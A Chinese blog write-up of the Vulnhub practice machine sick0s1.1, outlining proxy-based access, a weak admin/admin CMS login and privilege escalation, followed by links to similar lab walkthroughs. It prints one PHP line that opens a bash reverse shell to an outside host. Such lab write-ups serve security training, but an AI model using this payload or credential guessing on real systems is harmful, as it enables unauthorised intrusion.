sick0s1.1 靶机实战

于 2024-06-07 18:22:41 发布
阅读量416 收藏 1
点赞数 12
分类专栏: Vulnhub靶机实战 文章标签: 网络安全 web安全 web 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/braty_/article/details/139533558
版权

sick0s1.1

信息收集

nmap存活及端口:

nmap服务扫描:

web

80和8080都没有开放,,无法访问,gobuster等工具也跑不了,访问一下3128试试

根据端口服务扫描也能得知这是个http的代理服务器,,我们添加代理后再次访问80和8080,,

80可以成功访问:

扫描后台:

访问robots.txt 发现有个cms的目录,,


 

搜到后台路径:

弱口令 admin/admin登录:

在 homepage 中添加php反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.4/2233 0>&1'"); ?>

kali开启监听

web再次访问首页 即可获得shell

发现数据库帐号密码:

ssh登录:

提权:

flag:

kitha.
关注
  • 12
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之Kioptrix Level 1.1 靶机渗透(万能密码 命令注入)
afei001
04-16 996
练习环境     攻击机:kali     靶机:Kioptrix: Level 1.1 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 1.发现靶机,端口扫描 root@kali:~# netdiscover -r 192.168.43.0/16 ________________________...
Vulnhub系列-sick0s1.1
Yasso的博客
01-01 3412
靶机:192.168.12.130 kali: 192.168.249.128 一、信息收集 nmap -sV 192.168.12.130 –扫描开放端口 3128端口是作为代理 dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –扫下web目录 扫到robots.txt Wolf CMS 后台管理:?/admin 一试就出来了–弱口令:admin/admin Wolfcms 0.8.2中存在任意文件上传漏洞 weevely是适用
靶机-SickOs 1.2 Walkthrough
banacyo14206的博客
08-22 292
SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 参考:https://www.cnblogs.com/yuzly/p/10854392.html 提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linu...
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 292
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
VulnHub-sick0s1.1-靶机渗透学习
嗯嗯呐的博客
12-06 742
靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并在其上获得管理/根目录特权。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 目录信息收集getshell提权利用shellshock获得shell总结 信息收集 Nmap 扫描靶机端口 nmap扫描靶机
VulnHub-sick0s1.2-靶机渗透学习
嗯嗯呐的博客
12-08 907
靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ 靶机难度:中级(CTF) 靶机描述:这是SickOs的后续系列中的第二篇,并且与先前的发行版无关,挑战范围是在系统上获得最高特权。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 目录信息收集getshellPHP一句话木马获得shell利用MSF获得shell提权手工提权MSF提权总结 信息收集 nmap扫描确定靶机地址 nmap扫描端口 -sS 半端口扫描 -sV 扫描出对应程序的版
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机操作练习,earth 靶机实战练习
09-08
网络安全和渗透测试的学习过程中,靶机操作是一个重要的实践环节。在这个案例中,我们通过一个名为"earth"的靶机进行了一系列的操作,旨在提升信息收集、Web应用分析、权限提升和漏洞利用等技能。 首先,我们进行...
CTF6靶机实战.zip
05-25
本压缩包“CTF6靶机实战.zip”显然是一份用于CTF比赛的学习资料,包含了实战过程、反弹shell文件以及针对特定系统版本漏洞的利用脚本。 首先,我们要理解靶机的概念。在网络安全领域,靶机是模拟真实网络环境的...
vulnhub靶机渗透 sick0s1.1
RestoreJustice的博客
03-19 222
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。木马所在的public录入前面扫描时已经扫到,所以木马位置为http://192.168.110.132/wolfcms/试着访问http://192.168.110.132/,发现无法访问。查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf提权。/test.php,使用蚁剑连接,记得挂上靶机的3128代理。
Vulhub之sick0s篇
weixin_56306210的博客
08-21 155
Vulhub之sick0s篇
VulnHub-Sick0s1.2
江左盟的博客
08-29 1万+
目录 简介 信息收集 漏洞发现 漏洞利用 ​权限提升 ​总结 简介 该靶机Sick0s系列的第二个靶机,总体来说不难,提权那里需要花点时间,毕竟linpeas脚本没有将计划任务标红,总之我个人尝试了很久内核提权,浪费了大量时间,而且不知道是web服务太不稳定还是我用的ESXI太旧了,web服务挂掉的次数太多了。通过PUT方法在test目录下写入webshell获取服务器权限,然后利用chkrootkit 0.49本地提权漏洞提升至root权限。 信息收集 ...
网络安全sick0s 靶场实践之getshell
HBohan的博客
04-12 2402
主机发现 arp-scan -l 目标ip为192.168.1.12 端口扫描 nmap -sV -sC -T4 192.168.1.12 -p- -sV:查看端口对应服务 -sC:使用默认脚本测试 -T4:快速测试 -p-:全端口扫描 扫描完成,看到3128端口,尝试访问一下 在这里卡了很久,根据他的左下角版本信息搜了一下漏洞,还真有一个对应版本的绕过访问限制,不过试了很久都没成功,这里压根没想他的功能,实在过不去了,看了一下他的writeup才知道原来这个端口是http-proxy代理,
vulnHub-sick0s1.1学习 两种解法
m0_50431798的博客
06-07 1398
查看cat /etc/shadow说是权限不足,那就提权,使用sudo -l查看权限,全all,那就可以使用sudo su提权,提权后再查看/etc/shadow文件。通过这个可以确定用户名大概率是admin,但是密码不清楚,那就尝试弱口令,弱口令不可以就进行爆破,不过这个尝试5次失败就会禁止30秒,可以通过其他方式进行绕过。使用dirsearch扫描可以看到/index.php/login/ ,一个登录链接。查看passwd表可以看到有/bin/bash的用户有root,sickos。
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
靶机渗透测试实战(十)——SickOs1.2渗透实战
橘子女侠
05-11 4565
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访...
kali渗透综合靶机(十二)--SickOs1.2靶机
W小哥
03-30 1632
一、靶机下载 下载链接:https://download.vulnhub.com/sickos/sick0s1.2.zip 二、SickOs1.2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.6 靶机IP:192.168.212.9 1、主机发...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8449
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
My-cmsms靶机实战:ARP与Nmap扫描漏洞检测
在本篇vulnhub靶机实战指南中,我们将会深入探讨针对"My-cmsms"靶机实战操作。My-cmsms是一个基于MyCMS搭建的靶机,提供了一系列安全漏洞供网络安全爱好者进行渗透测试和学习。本文档以第26页开始,涵盖了两个关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值